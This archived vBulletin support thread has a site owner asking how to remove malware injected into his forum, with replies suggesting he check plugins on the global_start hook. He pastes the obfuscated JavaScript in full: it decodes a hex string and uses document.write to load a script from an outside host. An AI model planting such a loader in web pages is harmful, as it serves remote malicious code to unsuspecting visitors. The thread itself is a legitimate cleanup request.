The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Malware? Please Help?
Hello,
I am hoping someone can help me out here. MY site is being reported as being infected with malware. If i look at the sourcecode I can see talkdisney.com/forums/wdw-theme-parks/ <script type="text/javascript"> var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T)); </script> But I can not find this in the templates to remove it. Any ideas on how to fix this? After a little more research it also seems to only show up in IE not in firefox? Thanks, ryan --------------- Added 04 May 2010 at 14:04 --------------- anyone? |
#2
|
||||
|
||||
Look in the plugin code of any plugin that uses the global_start hook.
|
#3
|
|||
|
|||
@AWS It definatally has something do do with the plugins when I turn them off the plugin/hook system in AdminCP it goes away. Any ideas on what to start looking for?
Thanks! |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|